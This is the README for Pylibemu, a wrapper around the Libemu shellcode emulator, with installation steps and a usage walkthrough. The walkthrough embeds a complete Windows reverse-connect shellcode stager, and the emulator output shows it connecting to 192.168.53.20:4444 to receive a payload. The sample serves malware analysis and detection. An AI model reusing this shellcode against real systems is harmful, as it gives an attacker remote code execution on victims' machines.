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A Libemu Cython wrapper
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Pylibemu ======== Pylibemu is a wrapper for the Libemu library (http://libemu.carnivore.it). Requirements ============ - Python 2.5 or later - Libemu Installation ============ Pylibemu uses setuptools (http://peak.telecommunity.com/DevCenter/setuptools) To install Pylibemu, just do: $ python setup.py build $ sudo python setup.py install Usage ===== buffer@alnitak ~ $ python Python 2.6.6 (r266:84292, Feb 26 2011, 12:20:05) [GCC 4.4.4] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import pylibemu >>> shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" >>> shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" >>> shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" >>> shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" >>> shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" >>> shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" >>> shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" >>> shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" >>> shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" >>> shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" >>> shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" >>> shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" >>> shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" >>> emulator = pylibemu.Emulator() >>> offset = emulator.shellcode_getpc_test(shellcode) >>> offset 4 >>> emulator.prepare(shellcode, offset) >>> emulator.test() 0 >>> print emulator.emu_profile_output HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x0012fe90 => = "ws2_32"; ) = 0x71a10000; int WSAStartup ( WORD wVersionRequested = 2; LPWSADATA lpWSAData = 1244272; ) = 0; SOCKET WSASocket ( int af = 2; int type = 1; int protocol = 0; LPWSAPROTOCOL_INFO lpProtocolInfo = 0; GROUP g = 0; DWORD dwFlags = 0; ) = 66; int connect ( SOCKET s = 66; struct sockaddr_in * name = 0x0012fe88 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 339060928 (host=192.168.53.20); }; char sin_zero = " "; }; int namelen = 16; ) = 0; int recv ( SOCKET s = 66; char * buf = 0x0012fe88 => none; int len = 3072; int flags = 0; ) = 3072; >>> emulator.emu_profile_truncated False The new Emulator method `run' was introduced in Pylibemu 0.1.3 which allows not to worry about details. Moreover the new Emulator attribute `offset' allows to get such information if needed. >>> emulator = pylibemu.Emulator() >>> emulator.run(shellcode) 0 >>> emulator.offset 4 >>> print emulator.emu_profile_output HMODULE LoadLibraryA ( LPCTSTR = 0x01a3f990 => = "ws2_32"; ) = 1906376704; int WSAStartup ( WORD wVersionRequested = 2; LPWSADATA lpWSAData = 1244272; ) = 0; SOCKET WSASocket ( int af = 2; int type = 1; int protocol = 0; LPWSAPROTOCOL_INFO lpProtocolInfo = 0; GROUP g = 0; DWORD dwFlags = 0; ) = 66; int connect ( SOCKET s = 66; struct sockaddr_in * name = 0x0012fe88 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 339060928 (host=192.168.53.20); }; char sin_zero = " "; }; int namelen = 16; ) = 0; int recv ( SOCKET s = 66; char * = 0x01a40870 => none; int len = 3072; int flags = 0; ) = 3072; >>> emulator.emu_profile_truncated False The Emulator accepts the optional parameter `output_size' which defines how much memory will be reserved for storing the emulation profile dump. By default, its size is 1MB but it be can changed in two possible ways >>> emulator = pylibemu.Emulator(1024) >>> emulator = pylibemu.Emulator() >>> emulator.set_output_size(1024) If the reserved memory is not enough to contain the entire dump, the dump will be truncated and the Emulator attribute `emu_profile_truncated' will be set to True. This approach is needed in order not to penalize performances while analyzing some shellcodes which may produce several MBs dumps (such as the Metasploit windows/download_exec). If the entire dump is needed a really simple approach could be to check the `emu_profile_truncated' attribute after the shellcode emulation test, increase the reserved memory through the Emulator `set_output_size' method and subsequently run the shellcode emulation test again as shown above. License information =================== Copyright (C) 2011-2014 Angelo Dell'Aera <[email protected]> License: GNU General Public License, version 2 or later; see COPYING.txt included in this archive for details.
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